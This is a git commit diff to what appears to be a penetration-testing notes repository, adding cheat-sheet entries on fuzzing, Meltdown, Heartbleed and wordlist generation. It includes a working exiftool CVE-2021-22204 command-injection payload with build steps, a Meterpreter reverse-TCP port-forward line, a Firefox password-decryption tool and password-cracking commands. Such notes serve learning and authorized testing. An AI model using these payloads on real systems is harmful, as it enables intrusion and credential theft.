added password stuff

This commit is contained in:
Stefan Friese 2021-11-18 18:05:21 +01:00
parent c328c604dd
commit 469aeb2618
16 changed files with 133 additions and 2 deletions

3
.gitmodules vendored
View File

@ -70,3 +70,6 @@
[submodule "exploit/web/content_security_policy/JSONBee"] [submodule "exploit/web/content_security_policy/JSONBee"]
path = exploit/web/content_security_policy/JSONBee path = exploit/web/content_security_policy/JSONBee
url = https://github.com/zigoo0/JSONBee.git url = https://github.com/zigoo0/JSONBee.git
[submodule "post_exploitation/firefox_decrypt"]
path = post_exploitation/firefox_decrypt
url = https://github.com/unode/firefox_decrypt.git

View File

@ -0,0 +1,6 @@
# Wfuzz
* Fuzz parameters
```sh
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt -X POST --hh 45 -u http://<target-IP>/api/items\?FUZZ\=test
```

26
exploit/CPUs/meltdown.md Normal file
View File

@ -0,0 +1,26 @@
# Meltdown
* [PoC from IAIK](https://github.com/IAIK/meltdown.git)
![Overview](https://gcdn.pbrd.co/images/IitOpaf.png?raw=true "Meltdown")
* Each page table entries has the following flag values
* SUP (user or kernel mode)
* READ
* WRITE
* Flags are checked by the MMU
* Pipelined steps of an instruction are the following
* Fetch
* Decode
* Execute
* Memory access
* Register write back
* A pipeline can execute one of each steps concurrently every clock cycle.
* The MMU may jump between instruction queued in the pipeline to make use of time while the current instruction stalls.
* __Speculative execution__ is the reordering of instructions to speed up execution inside the pipeline.
* If a condition is executed speculatively, kernel memory may be executed. No error is thrown, because the is no assurance if the condition will actually be executed in the end.
* [Kernel Page Table Isolation](http://www.brendangregg.com/blog/2018-02-09/kpti-kaiser-meltdown-performance.html) can be used to mitigate meltdown.

12
exploit/linux/exiftool.md Normal file
View File

@ -0,0 +1,12 @@
# CVE-2021-22204
* Craft an a payload and execute it via exiftool
* [Article](https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/)
## Usage
* Payload is `(metadata "\c${system('id')};")`
```sh
sudo apt install djvulibre-bin
bzz payload payload.bzz
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
```

View File

@ -0,0 +1,8 @@
# Heartbleed
* SSL V1.0.1 and V1.0.1f
* Client sends msg, msglength
* If msg is 0 and the msglength is longer, return from server is arbitrary memory content
* [Heartbleed](https://heartbleed.com)

@ -1 +1 @@
Subproject commit c765a2e0d0c25b883dcb92a6966c69b9880098da Subproject commit eb411ea89b11df4485733201860619883a4f05e6

View File

@ -1 +0,0 @@
{"typ": "JWT", "alg": "HS256"}

View File

@ -123,6 +123,7 @@ document.onkeypress = function (e) {
``` ```
## Tricks and Tips ## Tricks and Tips
* Use Polyglots * Use Polyglots
* [XSS Filter Evasion Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html)
## Protection Methods ## Protection Methods
@ -133,3 +134,5 @@ There are many ways to prevent XSS, here are the 3 ways to keep cross-site scrip
2. Validating Input - This is the process of ensuring your application is rendering the correct data and preventing malicious data from doing harm to your site, database and users. Input validation is disallowing certain characters from being submit in the first place. 2. Validating Input - This is the process of ensuring your application is rendering the correct data and preventing malicious data from doing harm to your site, database and users. Input validation is disallowing certain characters from being submit in the first place.
3. Sanitising - Lastly, sanitizing data is a strong defence but should not be used to battle XSS attacks alone. Sanitizing user input is especially helpful on sites that allow HTML markup, changing the unacceptable user input into an acceptable format. For example you could sanitise the < character into the HTML entity &#60; 3. Sanitising - Lastly, sanitizing data is a strong defence but should not be used to battle XSS attacks alone. Sanitizing user input is especially helpful on sites that allow HTML markup, changing the unacceptable user input into an acceptable format. For example you could sanitise the < character into the HTML entity &#60;

View File

@ -1,10 +1,34 @@
# Generate Wordlists # Generate Wordlists
* [username_generator](https://github.com/therodri2/username_generator.git)
* [CeWL](../enumeration/CeWL/README.md) * [CeWL](../enumeration/CeWL/README.md)
* [Mentalist](https://github.com/sc0tfree/mentalist.git) * [Mentalist](https://github.com/sc0tfree/mentalist.git)
* [lyricpass](https://github.com/initstring/lyricpass.git) * [lyricpass](https://github.com/initstring/lyricpass.git)
* [pnwgen phonenumbers](https://github.com/toxydose/pnwgen.git) * [pnwgen phonenumbers](https://github.com/toxydose/pnwgen.git)
## Cupp
* [cupp](https://github.com/Mebus/cupp.git)
* Interactive dialogue via `cupp.py -i`
* Wordlistdownload via `cupp.py -l`
* Connections to alecto DB via `-a`
## crunch
```sh
crunch <minlen> <maxlen> <charPool> -o <output.file>
```
* Option `-t` specifies variable characters
* `@`, lower case alpha characters
* `,`, upper case alpha characters
* `%`, numeric characters
* `^`, special characters including space
```sh
crunch 8 8 -t passw%%rd
```
## ttpassgen ## ttpassgen
* [ttpassgen](https://github.com/tp7309/TTPassGen.git) * [ttpassgen](https://github.com/tp7309/TTPassGen.git)
* Generate lists from the ground up * Generate lists from the ground up

View File

@ -31,3 +31,7 @@ $[0-9]$[0-9]
### Existing Rules ### Existing Rules
* `l33t`, l33tsp34k * `l33t`, l33tsp34k
* `NT`, case mutation * `NT`, case mutation
* Example for `best64`
```sh
john --wordlist=single_password.txt --rules=best64 --stdout > out.txt
```

View File

@ -0,0 +1,9 @@
# Initial Passwords
* Services and products sometimes have credentials set initially.
* [default-password](https://default-password.info)
* [datarecovery](https://datarecovery.com/rd/default-passwords/)

View File

@ -56,3 +56,14 @@ Authorized audit of security systems of computers and networks.
* [OSSTMM3](https://www.isecom.org/OSSTMM.3.pdf) * [OSSTMM3](https://www.isecom.org/OSSTMM.3.pdf)
* [NIST](https://www.nist.gov/cyberframework) * [NIST](https://www.nist.gov/cyberframework)
* [CAF](https://www.ncsc.gov.uk/collection/caf/caf-principles-and-guidance) * [CAF](https://www.ncsc.gov.uk/collection/caf/caf-principles-and-guidance)
## Testing Webapps
* Two methods
1. Every Page and its functions one by one
2. Test by stages
* Authorization
* Authentication
* Injection
* Client Side Controls
* Application Logic

View File

@ -144,3 +144,8 @@ sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>
``` ```
* Exclude servers via `-x`, for example the target/gateway server * Exclude servers via `-x`, for example the target/gateway server
### Meterpreter
* Meterpreter with payload `set payload linux/x64/meterpreter_reverse_tcp` and
```sh
portfwd add -l 22 -p 22 -r 127.0.0.1
```

@ -0,0 +1 @@
Subproject commit b71a030ae8c2c5253716243a1a9375bd36074be8

View File

@ -0,0 +1,5 @@
# pspy
* Snoop processes withou root permissions
* [Repo](https://github.com/DominicBreuker/pspy.git)

15
xor_key_file.py Normal file
View File

@ -0,0 +1,15 @@
#!/usr/bin/env python
def xor(data, key):
keylen = len(key)
return bytearray((
(data[i] ^ key[i % keylen]) for i in range(0,len(data))
))
if __name__ == "__main__":
data = bytearray(open('topsecret.txt', 'rb').read())
key = b'key'
res = xor(data, key)
print(res.decode())